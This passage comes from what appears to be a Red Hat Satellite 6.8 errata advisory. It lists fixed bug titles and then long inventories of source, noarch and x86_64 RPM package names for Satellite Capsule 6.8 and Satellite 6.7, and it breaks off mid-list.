repo binding\n1877443 - Post Satellite 6.8 Upgrade AD authentication via LDAP fails when using an A record which returns 42 entries\n1877452 - content set mappings for satellite-tools-6.8-for-rhel-8 AUS repos are missing from cdn/cs_mappings-*.csv\n1877520 - content set mappings for satellite-tools-6.8-for-rhel-8 EUS repos are missing from cdn/cs_mappings-*.csv\n1877542 - content set mappings for rhel7 satellite-tools-6.8 EUS repos are missing from cdn/cs_mappings-*.csv\n1878194 - In Capsule upgrade, \"yum update\" dump some error messages. \n1878556 - PXE provisioning in satellite 6.8 requires httpboot enabled\n1878693 - Unable to perform image based deployment using hosts module from Red Hat Satellite Ansible Collections\n1878850 - creating host from hg doesn\u0027t resolves the user-data template\n1879151 - Remote execution status not updating with large number of hosts\n1879448 - Add hits details to host details page\n1879451 - Stop uploading if Satellite\u0027s setting is disconnected\n1879453 - Add plugin version to report metadata\n1879571 - unable to kexec discovered hosts - satellite tries to reach wrong IP\n1880637 - [6.8] satellite-installer always runs upgrade steps\n1881066 - Safemode doesn\u0027t allow to access \u0027host_cores\u0027 on #\u003cSafemode::ScopeObject\u003e\n1881078 - Use Passenger instead of Puma as the Foreman application server\n1881988 - [RFE] IPv6 support for Satellite 6.8\n1882276 - Satellite installation fails at execution of \u0027/usr/sbin/foreman-rake -- config -k \u0027remote_execution_cockpit_url\u0027 -v \u0027/webcon/=%{host}\u0027\u0027\n1882389 - Search query in template for LEAPP upgrade should be pre-filled when running from pre-upgrade results\n1883093 - installer-upgrade failed with error \"Could not evaluate: Proxy XYZ.com cannot be retrieved: unknown error (response 500)\"\n1883472 - [Sat6.8/Bug] when registering more than ~240 in parallel getting this error \"HTTP error (500 - Internal Server Error): Unable to register system, not all services available\"\n1887483 - Access insights pages refer to non-existing stylesheets, resulting in completely broken visuals\n1887489 - Insights rules can\u0027t be loaded on freshly installed Satellite system\n1887808 - Satellite-installer fails because of outdated RHSCL repository on DVD ISO\n\n6. Package List:\n\nRed Hat Satellite Capsule 6.8:\n\nSource:\nansible-collection-redhat-satellite-1.3.0-1.el7sat.src.rpm\nansible-runner-1.4.6-1.el7ar.src.rpm\nansiblerole-foreman_scap_client-0.0.5-1.el7sat.src.rpm\nansiblerole-insights-client-1.7.1-1.el7sat.src.rpm\nansiblerole-satellite-receptor-installer-0.6.13-1.el7sat.src.rpm\ncreaterepo_c-0.7.4-1.el7sat.src.rpm\nforeman-2.1.2.19-1.el7sat.src.rpm\nforeman-bootloaders-redhat-202005201200-1.el7sat.src.rpm\nforeman-discovery-image-3.6.7-1.el7sat.src.rpm\nforeman-discovery-image-service-1.0.0-3.el7sat.src.rpm\nforeman-installer-2.1.2.8-1.el7sat.src.rpm\nforeman-proxy-2.1.2-2.el7sat.src.rpm\nfuture-0.16.0-11.el7sat.src.rpm\ngofer-2.12.5-7.el7sat.src.rpm\nhfsplus-tools-332.14-12.el7.src.rpm\nkatello-3.16.0-1.el7sat.src.rpm\nkatello-certs-tools-2.7.1-1.el7sat.src.rpm\nkatello-client-bootstrap-1.7.5-1.el7sat.src.rpm\nkatello-selinux-3.4.0-1.el7sat.src.rpm\nkobo-0.5.1-1.el7sat.src.rpm\nlibmodulemd-1.7.0-1.pulp.el7sat.src.rpm\nlibsolv-0.7.4-4.pulp.el7sat.src.rpm\nlibwebsockets-2.4.2-2.el7.src.rpm\nlivecd-tools-20.4-1.6.el7sat.src.rpm\nmod_xsendfile-0.12-11.el7sat.src.rpm\nostree-2017.1-2.atomic.el7.src.rpm\npulp-2.21.3-1.el7sat.src.rpm\npulp-docker-3.2.7-1.el7sat.src.rpm\npulp-katello-1.0.3-1.el7sat.src.rpm\npulp-ostree-1.3.1-2.el7sat.src.rpm\npulp-puppet-2.21.3-2.el7sat.src.rpm\npulp-rpm-2.21.3-2.el7sat.src.rpm\npuppet-agent-6.14.0-2.el7sat.src.rpm\npuppet-agent-oauth-0.5.1-3.el7sat.src.rpm\npuppet-foreman_scap_client-0.4.0-1.el7sat.src.rpm\npuppetlabs-stdlib-4.25.1-2.el7sat.src.rpm\npuppetserver-6.13.0-1.el7sat.src.rpm\npycairo-1.16.3-9.el7sat.src.rpm\npygobject3-3.28.3-2.el7sat.src.rpm\npython-amqp-2.2.2-5.el7sat.src.rpm\npython-anyjson-0.3.3-11.el7sat.src.rpm\npython-apypie-0.2.2-1.el7sat.src.rpm\npython-billiard-3.5.0.3-3.el7sat.src.rpm\npython-blinker-1.3-2.el7sat.src.rpm\npython-celery-4.0.2-9.el7sat.src.rpm\npython-click-6.7-9.el7sat.src.rpm\npython-crane-3.3.1-9.el7sat.src.rpm\npython-daemon-2.1.2-7.el7at.src.rpm\npython-django-1.11.29-1.el7sat.src.rpm\npython-flask-0.12.2-4.el7sat.src.rpm\npython-gnupg-0.3.7-1.el7ui.src.rpm\npython-isodate-0.5.4-12.el7sat.src.rpm\npython-itsdangerous-0.24-15.el7sat.src.rpm\npython-jinja2-2.10-10.el7sat.src.rpm\npython-jmespath-0.9.0-6.el7_7.src.rpm\npython-kid-0.9.6-11.el7sat.src.rpm\npython-kombu-4.0.2-13.el7sat.src.rpm\npython-lockfile-0.11.0-10.el7ar.src.rpm\npython-markupsafe-0.23-21.el7sat.src.rpm\npython-mongoengine-0.10.5-2.el7sat.src.rpm\npython-nectar-1.6.2-1.el7sat.src.rpm\npython-oauth2-1.5.211-8.el7sat.src.rpm\npython-okaara-1.0.37-2.el7sat.src.rpm\npython-pexpect-4.6-1.el7at.src.rpm\npython-psutil-5.0.1-3.el7sat.src.rpm\npython-ptyprocess-0.5.2-3.el7at.src.rpm\npython-pycurl-7.43.0.2-4.el7sat.src.rpm\npython-pymongo-3.2-2.el7sat.src.rpm\npython-qpid-1.35.0-5.el7.src.rpm\npython-semantic_version-2.2.0-6.el7sat.src.rpm\npython-simplejson-3.2.0-1.el7sat.src.rpm\npython-twisted-16.4.1-12.el7sat.src.rpm\npython-vine-1.1.3-6.el7sat.src.rpm\npython-werkzeug-0.12.2-5.el7sat.src.rpm\npython-zope-interface-4.0.5-4.el7.src.rpm\nqpid-cpp-1.36.0-28.el7amq.src.rpm\nqpid-dispatch-1.5.0-4.el7.src.rpm\nqpid-proton-0.28.0-3.el7.src.rpm\nredhat-access-insights-puppet-1.0.1-1.el7sat.src.rpm\nrepoview-0.6.6-11.el7sat.src.rpm\nrubygem-fast_gettext-1.1.0-4.el7sat.src.rpm\nrubygem-highline-1.7.8-3.el7sat.src.rpm\nrubygem-newt-0.9.6-3.el7sat.src.rpm\nrubygem-oauth-0.5.4-2.el7sat.src.rpm\nsaslwrapper-0.22-5.el7sat.src.rpm\nsatellite-6.8.0-1.el7sat.src.rpm\nsatellite-installer-6.8.0.11-1.el7sat.src.rpm\ntfm-6.1-1.el7sat.src.rpm\ntfm-rubygem-algebrick-0.7.3-6.el7sat.src.rpm\ntfm-rubygem-ansi-1.5.0-2.el7sat.src.rpm\ntfm-rubygem-apipie-params-0.0.5-5.el7sat.src.rpm\ntfm-rubygem-bundler_ext-0.4.1-4.el7sat.src.rpm\ntfm-rubygem-clamp-1.1.2-5.el7sat.src.rpm\ntfm-rubygem-concurrent-ruby-1.1.6-2.el7sat.src.rpm\ntfm-rubygem-concurrent-ruby-edge-0.6.0-2.el7sat.src.rpm\ntfm-rubygem-domain_name-0.5.20160310-4.el7sat.src.rpm\ntfm-rubygem-dynflow-1.4.7-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-faraday-0.15.4-1.el7sat.src.rpm\ntfm-rubygem-faraday_middleware-0.13.1-2.el7sat.src.rpm\ntfm-rubygem-ffi-1.12.2-1.el7sat.src.rpm\ntfm-rubygem-foreman-tasks-core-0.3.4-1.el7sat.src.rpm\ntfm-rubygem-foreman_ansible_core-3.0.4-1.el7sat.src.rpm\ntfm-rubygem-foreman_remote_execution_core-1.3.0-1.el7sat.src.rpm\ntfm-rubygem-gssapi-1.2.0-6.el7sat.src.rpm\ntfm-rubygem-hashie-3.6.0-1.el7sat.src.rpm\ntfm-rubygem-highline-1.7.8-4.el7sat.src.rpm\ntfm-rubygem-http-cookie-1.0.2-5.el7sat.src.rpm\ntfm-rubygem-infoblox-3.0.0-3.el7sat.src.rpm\ntfm-rubygem-journald-logger-2.0.4-2.el7sat.src.rpm\ntfm-rubygem-journald-native-1.0.11-2.el7sat.src.rpm\ntfm-rubygem-jwt-2.2.1-1.el7sat.src.rpm\ntfm-rubygem-kafo-4.1.0-3.el7sat.src.rpm\ntfm-rubygem-kafo_parsers-1.1.0-3.el7sat.src.rpm\ntfm-rubygem-kafo_wizards-0.0.1-4.el7sat.src.rpm\ntfm-rubygem-little-plugger-1.1.4-1.el7sat.src.rpm\ntfm-rubygem-logging-2.2.2-6.el7sat.src.rpm\ntfm-rubygem-logging-journald-2.0.0-2.el7sat.src.rpm\ntfm-rubygem-mime-types-3.2.2-4.el7sat.src.rpm\ntfm-rubygem-mime-types-data-3.2018.0812-4.el7sat.src.rpm\ntfm-rubygem-multi_json-1.14.1-1.el7sat.src.rpm\ntfm-rubygem-multipart-post-2.0.0-1.el7sat.src.rpm\ntfm-rubygem-mustermann-1.0.2-4.el7sat.src.rpm\ntfm-rubygem-net-ssh-4.2.0-1.el7sat.src.rpm\ntfm-rubygem-net-ssh-krb-0.4.0-3.el7sat.src.rpm\ntfm-rubygem-netrc-0.11.0-3.el7sat.src.rpm\ntfm-rubygem-openscap-0.4.9-3.el7sat.src.rpm\ntfm-rubygem-powerbar-2.0.1-2.el7sat.src.rpm\ntfm-rubygem-rack-2.2.3-1.el7sat.src.rpm\ntfm-rubygem-rack-protection-2.0.3-4.el7sat.src.rpm\ntfm-rubygem-rb-inotify-0.9.7-5.el7sat.src.rpm\ntfm-rubygem-rest-client-2.0.2-3.el7sat.src.rpm\ntfm-rubygem-rkerberos-0.1.5-18.el7sat.src.rpm\ntfm-rubygem-rsec-0.4.3-4.el7sat.src.rpm\ntfm-rubygem-ruby-libvirt-0.7.0-4.el7sat.src.rpm\ntfm-rubygem-rubyipmi-0.10.0-6.el7sat.src.rpm\ntfm-rubygem-sequel-5.7.1-2.el7sat.src.rpm\ntfm-rubygem-sinatra-2.0.3-4.el7sat.src.rpm\ntfm-rubygem-smart_proxy_ansible-3.0.1-5.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dhcp_infoblox-0.0.16-3.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dhcp_remote_isc-0.0.5-2.el7sat.src.rpm\ntfm-rubygem-smart_proxy_discovery-1.0.5-5.el7sat.src.rpm\ntfm-rubygem-smart_proxy_discovery_image-1.2.1-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dns_infoblox-1.0.0-7.fm2_1.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dynflow-0.2.4-5.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dynflow_core-0.2.6-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-smart_proxy_openscap-0.7.3-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-smart_proxy_pulp-2.1.0-2.el7sat.src.rpm\ntfm-rubygem-smart_proxy_remote_execution_ssh-0.3.0-3.el7sat.src.rpm\ntfm-rubygem-sqlite3-1.3.13-5.el7sat.src.rpm\ntfm-rubygem-statsd-instrument-2.1.4-2.el7sat.src.rpm\ntfm-rubygem-tilt-2.0.8-4.el7sat.src.rpm\ntfm-rubygem-unf-0.1.3-7.el7sat.src.rpm\ntfm-rubygem-unf_ext-0.0.7.2-1.el7sat.src.rpm\ntfm-rubygem-xmlrpc-0.3.0-2.el7sat.src.rpm\n\nnoarch:\nansible-collection-redhat-satellite-1.3.0-1.el7sat.noarch.rpm\nansible-runner-1.4.6-1.el7ar.noarch.rpm\nansiblerole-foreman_scap_client-0.0.5-1.el7sat.noarch.rpm\nansiblerole-insights-client-1.7.1-1.el7sat.noarch.rpm\nansiblerole-satellite-receptor-installer-0.6.13-1.el7sat.noarch.rpm\ncrane-selinux-3.4.0-1.el7sat.noarch.rpm\nforeman-bootloaders-redhat-202005201200-1.el7sat.noarch.rpm\nforeman-bootloaders-redhat-tftpboot-202005201200-1.el7sat.noarch.rpm\nforeman-debug-2.1.2.19-1.el7sat.noarch.rpm\nforeman-discovery-image-3.6.7-1.el7sat.noarch.rpm\nforeman-installer-2.1.2.8-1.el7sat.noarch.rpm\nforeman-installer-katello-2.1.2.8-1.el7sat.noarch.rpm\nforeman-proxy-2.1.2-2.el7sat.noarch.rpm\nforeman-proxy-content-3.16.0-1.el7sat.noarch.rpm\nforeman-proxy-journald-2.1.2-2.el7sat.noarch.rpm\nkatello-certs-tools-2.7.1-1.el7sat.noarch.rpm\nkatello-client-bootstrap-1.7.5-1.el7sat.noarch.rpm\nkatello-common-3.16.0-1.el7sat.noarch.rpm\nkatello-debug-3.16.0-1.el7sat.noarch.rpm\nkobo-0.5.1-1.el7sat.noarch.rpm\npulp-admin-client-2.21.3-1.el7sat.noarch.rpm\npulp-docker-admin-extensions-3.2.7-1.el7sat.noarch.rpm\npulp-docker-plugins-3.2.7-1.el7sat.noarch.rpm\npulp-katello-1.0.3-1.el7sat.noarch.rpm\npulp-maintenance-2.21.3-1.el7sat.noarch.rpm\npulp-nodes-child-2.21.3-1.el7sat.noarch.rpm\npulp-nodes-common-2.21.3-1.el7sat.noarch.rpm\npulp-nodes-parent-2.21.3-1.el7sat.noarch.rpm\npulp-ostree-admin-extensions-1.3.1-2.el7sat.noarch.rpm\npulp-ostree-plugins-1.3.1-2.el7sat.noarch.rpm\npulp-puppet-admin-extensions-2.21.3-2.el7sat.noarch.rpm\npulp-puppet-plugins-2.21.3-2.el7sat.noarch.rpm\npulp-rpm-admin-extensions-2.21.3-2.el7sat.noarch.rpm\npulp-rpm-plugins-2.21.3-2.el7sat.noarch.rpm\npulp-selinux-2.21.3-1.el7sat.noarch.rpm\npulp-server-2.21.3-1.el7sat.noarch.rpm\npuppet-agent-oauth-0.5.1-3.el7sat.noarch.rpm\npuppet-foreman_scap_client-0.4.0-1.el7sat.noarch.rpm\npuppetlabs-stdlib-4.25.1-2.el7sat.noarch.rpm\npuppetserver-6.13.0-1.el7sat.noarch.rpm\npython-blinker-1.3-2.el7sat.noarch.rpm\npython-gnupg-0.3.7-1.el7ui.noarch.rpm\npython-gofer-2.12.5-7.el7sat.noarch.rpm\npython-gofer-qpid-2.12.5-7.el7sat.noarch.rpm\npython-kid-0.9.6-11.el7sat.noarch.rpm\npython-mongoengine-0.10.5-2.el7sat.noarch.rpm\npython-nectar-1.6.2-1.el7sat.noarch.rpm\npython-oauth2-1.5.211-8.el7sat.noarch.rpm\npython-pulp-agent-lib-2.21.3-1.el7sat.noarch.rpm\npython-pulp-bindings-2.21.3-1.el7sat.noarch.rpm\npython-pulp-client-lib-2.21.3-1.el7sat.noarch.rpm\npython-pulp-common-2.21.3-1.el7sat.noarch.rpm\npython-pulp-docker-common-3.2.7-1.el7sat.noarch.rpm\npython-pulp-integrity-2.21.3-2.el7sat.noarch.rpm\npython-pulp-oid_validation-2.21.3-1.el7sat.noarch.rpm\npython-pulp-ostree-common-1.3.1-2.el7sat.noarch.rpm\npython-pulp-puppet-common-2.21.3-2.el7sat.noarch.rpm\npython-pulp-repoauth-2.21.3-1.el7sat.noarch.rpm\npython-pulp-rpm-common-2.21.3-2.el7sat.noarch.rpm\npython-pulp-streamer-2.21.3-1.el7sat.noarch.rpm\npython-qpid-1.35.0-5.el7.noarch.rpm\npython-semantic_version-2.2.0-6.el7sat.noarch.rpm\npython2-amqp-2.2.2-5.el7sat.noarch.rpm\npython2-ansible-runner-1.4.6-1.el7ar.noarch.rpm\npython2-anyjson-0.3.3-11.el7sat.noarch.rpm\npython2-apypie-0.2.2-1.el7sat.noarch.rpm\npython2-celery-4.0.2-9.el7sat.noarch.rpm\npython2-click-6.7-9.el7sat.noarch.rpm\npython2-crane-3.3.1-9.el7sat.noarch.rpm\npython2-daemon-2.1.2-7.el7at.noarch.rpm\npython2-django-1.11.29-1.el7sat.noarch.rpm\npython2-flask-0.12.2-4.el7sat.noarch.rpm\npython2-future-0.16.0-11.el7sat.noarch.rpm\npython2-isodate-0.5.4-12.el7sat.noarch.rpm\npython2-itsdangerous-0.24-15.el7sat.noarch.rpm\npython2-jinja2-2.10-10.el7sat.noarch.rpm\npython2-jmespath-0.9.0-6.el7_7.noarch.rpm\npython2-kombu-4.0.2-13.el7sat.noarch.rpm\npython2-lockfile-0.11.0-10.el7ar.noarch.rpm\npython2-okaara-1.0.37-2.el7sat.noarch.rpm\npython2-pexpect-4.6-1.el7at.noarch.rpm\npython2-ptyprocess-0.5.2-3.el7at.noarch.rpm\npython2-vine-1.1.3-6.el7sat.noarch.rpm\npython2-werkzeug-0.12.2-5.el7sat.noarch.rpm\nqpid-dispatch-tools-1.5.0-4.el7.noarch.rpm\nqpid-tools-1.36.0-28.el7amq.noarch.rpm\nredhat-access-insights-puppet-1.0.1-1.el7sat.noarch.rpm\nrepoview-0.6.6-11.el7sat.noarch.rpm\nrubygem-fast_gettext-1.1.0-4.el7sat.noarch.rpm\nrubygem-highline-1.7.8-3.el7sat.noarch.rpm\nrubygem-oauth-0.5.4-2.el7sat.noarch.rpm\nsatellite-capsule-6.8.0-1.el7sat.noarch.rpm\nsatellite-common-6.8.0-1.el7sat.noarch.rpm\nsatellite-debug-tools-6.8.0-1.el7sat.noarch.rpm\nsatellite-installer-6.8.0.11-1.el7sat.noarch.rpm\ntfm-rubygem-algebrick-0.7.3-6.el7sat.noarch.rpm\ntfm-rubygem-ansi-1.5.0-2.el7sat.noarch.rpm\ntfm-rubygem-apipie-params-0.0.5-5.el7sat.noarch.rpm\ntfm-rubygem-bundler_ext-0.4.1-4.el7sat.noarch.rpm\ntfm-rubygem-clamp-1.1.2-5.el7sat.noarch.rpm\ntfm-rubygem-concurrent-ruby-1.1.6-2.el7sat.noarch.rpm\ntfm-rubygem-concurrent-ruby-edge-0.6.0-2.el7sat.noarch.rpm\ntfm-rubygem-domain_name-0.5.20160310-4.el7sat.noarch.rpm\ntfm-rubygem-dynflow-1.4.7-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-faraday-0.15.4-1.el7sat.noarch.rpm\ntfm-rubygem-faraday_middleware-0.13.1-2.el7sat.noarch.rpm\ntfm-rubygem-foreman-tasks-core-0.3.4-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_ansible_core-3.0.4-1.el7sat.noarch.rpm\ntfm-rubygem-foreman_remote_execution_core-1.3.0-1.el7sat.noarch.rpm\ntfm-rubygem-gssapi-1.2.0-6.el7sat.noarch.rpm\ntfm-rubygem-hashie-3.6.0-1.el7sat.noarch.rpm\ntfm-rubygem-highline-1.7.8-4.el7sat.noarch.rpm\ntfm-rubygem-http-cookie-1.0.2-5.el7sat.noarch.rpm\ntfm-rubygem-infoblox-3.0.0-3.el7sat.noarch.rpm\ntfm-rubygem-journald-logger-2.0.4-2.el7sat.noarch.rpm\ntfm-rubygem-jwt-2.2.1-1.el7sat.noarch.rpm\ntfm-rubygem-kafo-4.1.0-3.el7sat.noarch.rpm\ntfm-rubygem-kafo_parsers-1.1.0-3.el7sat.noarch.rpm\ntfm-rubygem-kafo_wizards-0.0.1-4.el7sat.noarch.rpm\ntfm-rubygem-little-plugger-1.1.4-1.el7sat.noarch.rpm\ntfm-rubygem-logging-2.2.2-6.el7sat.noarch.rpm\ntfm-rubygem-logging-journald-2.0.0-2.el7sat.noarch.rpm\ntfm-rubygem-mime-types-3.2.2-4.el7sat.noarch.rpm\ntfm-rubygem-mime-types-data-3.2018.0812-4.el7sat.noarch.rpm\ntfm-rubygem-multi_json-1.14.1-1.el7sat.noarch.rpm\ntfm-rubygem-multipart-post-2.0.0-1.el7sat.noarch.rpm\ntfm-rubygem-mustermann-1.0.2-4.el7sat.noarch.rpm\ntfm-rubygem-net-ssh-4.2.0-1.el7sat.noarch.rpm\ntfm-rubygem-net-ssh-krb-0.4.0-3.el7sat.noarch.rpm\ntfm-rubygem-netrc-0.11.0-3.el7sat.noarch.rpm\ntfm-rubygem-openscap-0.4.9-3.el7sat.noarch.rpm\ntfm-rubygem-powerbar-2.0.1-2.el7sat.noarch.rpm\ntfm-rubygem-rack-2.2.3-1.el7sat.noarch.rpm\ntfm-rubygem-rack-protection-2.0.3-4.el7sat.noarch.rpm\ntfm-rubygem-rb-inotify-0.9.7-5.el7sat.noarch.rpm\ntfm-rubygem-rest-client-2.0.2-3.el7sat.noarch.rpm\ntfm-rubygem-rsec-0.4.3-4.el7sat.noarch.rpm\ntfm-rubygem-rubyipmi-0.10.0-6.el7sat.noarch.rpm\ntfm-rubygem-sequel-5.7.1-2.el7sat.noarch.rpm\ntfm-rubygem-sinatra-2.0.3-4.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_ansible-3.0.1-5.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dhcp_infoblox-0.0.16-3.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dhcp_remote_isc-0.0.5-2.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_discovery-1.0.5-5.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_discovery_image-1.2.1-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dns_infoblox-1.0.0-7.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dynflow-0.2.4-5.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_dynflow_core-0.2.6-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_openscap-0.7.3-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_pulp-2.1.0-2.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_remote_execution_ssh-0.3.0-3.el7sat.noarch.rpm\ntfm-rubygem-statsd-instrument-2.1.4-2.el7sat.noarch.rpm\ntfm-rubygem-tilt-2.0.8-4.el7sat.noarch.rpm\ntfm-rubygem-unf-0.1.3-7.el7sat.noarch.rpm\ntfm-rubygem-xmlrpc-0.3.0-2.el7sat.noarch.rpm\n\nx86_64:\ncreaterepo_c-0.7.4-1.el7sat.x86_64.rpm\ncreaterepo_c-debuginfo-0.7.4-1.el7sat.x86_64.rpm\ncreaterepo_c-libs-0.7.4-1.el7sat.x86_64.rpm\nforeman-discovery-image-service-1.0.0-3.el7sat.x86_64.rpm\nforeman-discovery-image-service-tui-1.0.0-3.el7sat.x86_64.rpm\nhfsplus-tools-332.14-12.el7.x86_64.rpm\nhfsplus-tools-debuginfo-332.14-12.el7.x86_64.rpm\nlibmodulemd-1.7.0-1.pulp.el7sat.x86_64.rpm\nlibmodulemd-debuginfo-1.7.0-1.pulp.el7sat.x86_64.rpm\nlibsolv-0.7.4-4.pulp.el7sat.x86_64.rpm\nlibsolv-debuginfo-0.7.4-4.pulp.el7sat.x86_64.rpm\nlibwebsockets-2.4.2-2.el7.x86_64.rpm\nlibwebsockets-debuginfo-2.4.2-2.el7.x86_64.rpm\nlivecd-tools-20.4-1.6.el7sat.x86_64.rpm\nmod_xsendfile-0.12-11.el7sat.x86_64.rpm\nmod_xsendfile-debuginfo-0.12-11.el7sat.x86_64.rpm\nostree-2017.1-2.atomic.el7.x86_64.rpm\nostree-debuginfo-2017.1-2.atomic.el7.x86_64.rpm\npuppet-agent-6.14.0-2.el7sat.x86_64.rpm\npycairo-1.16.3-9.el7sat.x86_64.rpm\npycairo-debuginfo-1.16.3-9.el7sat.x86_64.rpm\npygobject3-debuginfo-3.28.3-2.el7sat.x86_64.rpm\npython-billiard-debuginfo-3.5.0.3-3.el7sat.x86_64.rpm\npython-bson-3.2-2.el7sat.x86_64.rpm\npython-imgcreate-20.4-1.6.el7sat.x86_64.rpm\npython-markupsafe-debuginfo-0.23-21.el7sat.x86_64.rpm\npython-psutil-5.0.1-3.el7sat.x86_64.rpm\npython-psutil-debuginfo-5.0.1-3.el7sat.x86_64.rpm\npython-pycurl-debuginfo-7.43.0.2-4.el7sat.x86_64.rpm\npython-pymongo-3.2-2.el7sat.x86_64.rpm\npython-pymongo-debuginfo-3.2-2.el7sat.x86_64.rpm\npython-pymongo-gridfs-3.2-2.el7sat.x86_64.rpm\npython-qpid-proton-0.28.0-3.el7.x86_64.rpm\npython-qpid-qmf-1.36.0-28.el7amq.x86_64.rpm\npython-saslwrapper-0.22-5.el7sat.x86_64.rpm\npython-simplejson-3.2.0-1.el7sat.x86_64.rpm\npython-simplejson-debuginfo-3.2.0-1.el7sat.x86_64.rpm\npython-twisted-debuginfo-16.4.1-12.el7sat.x86_64.rpm\npython-zope-interface-4.0.5-4.el7.x86_64.rpm\npython-zope-interface-debuginfo-4.0.5-4.el7.x86_64.rpm\npython2-billiard-3.5.0.3-3.el7sat.x86_64.rpm\npython2-gobject-3.28.3-2.el7sat.x86_64.rpm\npython2-gobject-base-3.28.3-2.el7sat.x86_64.rpm\npython2-markupsafe-0.23-21.el7sat.x86_64.rpm\npython2-pycurl-7.43.0.2-4.el7sat.x86_64.rpm\npython2-solv-0.7.4-4.pulp.el7sat.x86_64.rpm\npython2-twisted-16.4.1-12.el7sat.x86_64.rpm\nqpid-cpp-client-1.36.0-28.el7amq.x86_64.rpm\nqpid-cpp-debuginfo-1.36.0-28.el7amq.x86_64.rpm\nqpid-cpp-server-1.36.0-28.el7amq.x86_64.rpm\nqpid-cpp-server-linearstore-1.36.0-28.el7amq.x86_64.rpm\nqpid-dispatch-debuginfo-1.5.0-4.el7.x86_64.rpm\nqpid-dispatch-router-1.5.0-4.el7.x86_64.rpm\nqpid-proton-c-0.28.0-3.el7.x86_64.rpm\nqpid-proton-debuginfo-0.28.0-3.el7.x86_64.rpm\nqpid-qmf-1.36.0-28.el7amq.x86_64.rpm\nrubygem-newt-0.9.6-3.el7sat.x86_64.rpm\nrubygem-newt-debuginfo-0.9.6-3.el7sat.x86_64.rpm\nsaslwrapper-0.22-5.el7sat.x86_64.rpm\nsaslwrapper-debuginfo-0.22-5.el7sat.x86_64.rpm\ntfm-rubygem-ffi-1.12.2-1.el7sat.x86_64.rpm\ntfm-rubygem-ffi-debuginfo-1.12.2-1.el7sat.x86_64.rpm\ntfm-rubygem-journald-native-1.0.11-2.el7sat.x86_64.rpm\ntfm-rubygem-journald-native-debuginfo-1.0.11-2.el7sat.x86_64.rpm\ntfm-rubygem-rkerberos-0.1.5-18.el7sat.x86_64.rpm\ntfm-rubygem-rkerberos-debuginfo-0.1.5-18.el7sat.x86_64.rpm\ntfm-rubygem-ruby-libvirt-0.7.0-4.el7sat.x86_64.rpm\ntfm-rubygem-ruby-libvirt-debuginfo-0.7.0-4.el7sat.x86_64.rpm\ntfm-rubygem-sqlite3-1.3.13-5.el7sat.x86_64.rpm\ntfm-rubygem-sqlite3-debuginfo-1.3.13-5.el7sat.x86_64.rpm\ntfm-rubygem-unf_ext-0.0.7.2-1.el7sat.x86_64.rpm\ntfm-rubygem-unf_ext-debuginfo-0.0.7.2-1.el7sat.x86_64.rpm\ntfm-runtime-6.1-1.el7sat.x86_64.rpm\n\nRed Hat Satellite 6.7:\n\nSource:\nansible-collection-redhat-satellite-1.3.0-1.el7sat.src.rpm\nansible-runner-1.4.6-1.el7ar.src.rpm\nansiblerole-foreman_scap_client-0.0.5-1.el7sat.src.rpm\nansiblerole-insights-client-1.7.1-1.el7sat.src.rpm\nansiblerole-satellite-receptor-installer-0.6.13-1.el7sat.src.rpm\ncandlepin-3.1.21-1.el7sat.src.rpm\ncreaterepo_c-0.7.4-1.el7sat.src.rpm\nforeman-2.1.2.19-1.el7sat.src.rpm\nforeman-bootloaders-redhat-202005201200-1.el7sat.src.rpm\nforeman-discovery-image-3.6.7-1.el7sat.src.rpm\nforeman-discovery-image-service-1.0.0-3.el7sat.src.rpm\nforeman-installer-2.1.2.8-1.el7sat.src.rpm\nforeman-proxy-2.1.2-2.el7sat.src.rpm\nforeman-selinux-2.1.2.3-1.el7sat.src.rpm\nfuture-0.16.0-11.el7sat.src.rpm\ngofer-2.12.5-7.el7sat.src.rpm\nhfsplus-tools-332.14-12.el7.src.rpm\nkatello-3.16.0-1.el7sat.src.rpm\nkatello-certs-tools-2.7.1-1.el7sat.src.rpm\nkatello-client-bootstrap-1.7.5-1.el7sat.src.rpm\nkatello-selinux-3.4.0-1.el7sat.src.rpm\nkeycloak-httpd-client-install-1.2.2-1.el7sat.src.rpm\nkobo-0.5.1-1.el7sat.src.rpm\nlibmodulemd-1.7.0-1.pulp.el7sat.src.rpm\nlibsolv-0.7.4-4.pulp.el7sat.src.rpm\nlibwebsockets-2.4.2-2.el7.src.rpm\nlivecd-tools-20.4-1.6.el7sat.src.rpm\nmod_xsendfile-0.12-11.el7sat.src.rpm\nostree-2017.1-2.atomic.el7.src.rpm\npcp-mmvstatsd-0.4-2.el7sat.src.rpm\npulp-2.21.3-1.el7sat.src.rpm\npulp-docker-3.2.7-1.el7sat.src.rpm\npulp-katello-1.0.3-1.el7sat.src.rpm\npulp-ostree-1.3.1-2.el7sat.src.rpm\npulp-puppet-2.21.3-2.el7sat.src.rpm\npulp-rpm-2.21.3-2.el7sat.src.rpm\npuppet-agent-6.14.0-2.el7sat.src.rpm\npuppet-agent-oauth-0.5.1-3.el7sat.src.rpm\npuppet-foreman_scap_client-0.4.0-1.el7sat.src.rpm\npuppetlabs-stdlib-4.25.1-2.el7sat.src.rpm\npuppetserver-6.13.0-1.el7sat.src.rpm\npycairo-1.16.3-9.el7sat.src.rpm\npygobject3-3.28.3-2.el7sat.src.rpm\npython-aiohttp-3.6.2-4.el7ar.src.rpm\npython-amqp-2.2.2-5.el7sat.src.rpm\npython-anyjson-0.3.3-11.el7sat.src.rpm\npython-apypie-0.2.2-1.el7sat.src.rpm\npython-async-timeout-3.0.1-2.el7ar.src.r